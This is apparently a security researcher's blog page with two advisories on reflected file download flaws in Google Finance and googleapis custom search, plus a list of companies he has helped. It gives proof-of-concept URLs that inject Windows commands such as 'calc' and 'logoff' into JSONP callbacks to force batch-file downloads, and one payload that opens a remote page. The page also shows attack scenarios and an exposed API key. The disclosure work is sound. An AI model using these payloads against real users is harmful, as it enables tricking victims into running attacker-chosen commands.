David Sopas – Web Security Researcher

google

21/01/16 Advisories # , ,

Google Finance Reflected File Download

Google Finance Reflected File Download

Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.

When I noticed this request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=?

Which returned the following information:

// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]

I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

Which returned the following information:

//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.

I tried successfully with the following browsers:

  • Firefox latest version
  • Opera latest version
  • Internet Explorer 8 and 9

What are the limitations?

I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.

Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logoffs the authenticated user]

Possible attack scenario:

  1. Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
  2. Victim downloads the file and execute it.
  3. After execution of the batch file it will logoff the victim from the operating system.

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.

0 likes no responses
07/01/16 Swag # , , , , ,

Companies that I’ve helped improve their security

Companies that I’ve helped improve their security

Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle.

The other ones are private 🙂

0 likes no responses
10/09/15 Advisories # , ,

Google Reflected Filename Download

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims computer using Google domain as platform and trust source.

I come across this security issue because I detected a JSON request using Google Inspector made by the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After checking that callback variable could be reflected on the screen I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
"error": {
"errors": [
{
"domain": "usageLimits",
"reason": "keyInvalid",
"message": "Bad Request"
}
],
"code": 400,
"message": "Bad Request"
}
}
);

It returns HTTP status code 200 even when the JSON request tells that’s an error (?). In this case callback only allows a command to be executed without spaces so in the following proof-of-concept I could execute calc from Windows.

But I wanted a better and more exploitable proof-of-concept so I tried with the query parameter – “q”:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The attack is reflected. Due to the fact that I couldn’t control the filename and force a download I needed to use HTML5 vector supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept  (downloads batch file that a new Chrome window with a URL – in my PoC is just text):

google_rfd3

google_rfd2

This works mostly on all Microsoft Windows versions. It also can be used in Linux and OSX but it needs more user interaction. For multi-plataform a malicious user could create a .htm file instead of a .bat file being the HTML file malicious. This is might be an alternative attack method to work with all operating systems.

So in my proof-of-concept I was able to execute a new window on Chrome browser with a page that simulates malware [it’s just text].

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Google offers – similar to my proof-of-concept
  2. Victim downloads the file thinking that is from a trusted domain [googleapis.com]
  3. Malicious user gains control over victims machine

How to fix this issue?
Google already fixed most of these issues by using HTTP header Content-disposition:attachment; filename=”f.txt” that will force the download to f.txt every time. But this time they decided not to fix it because they say that needs to many user interaction.

0 likes no responses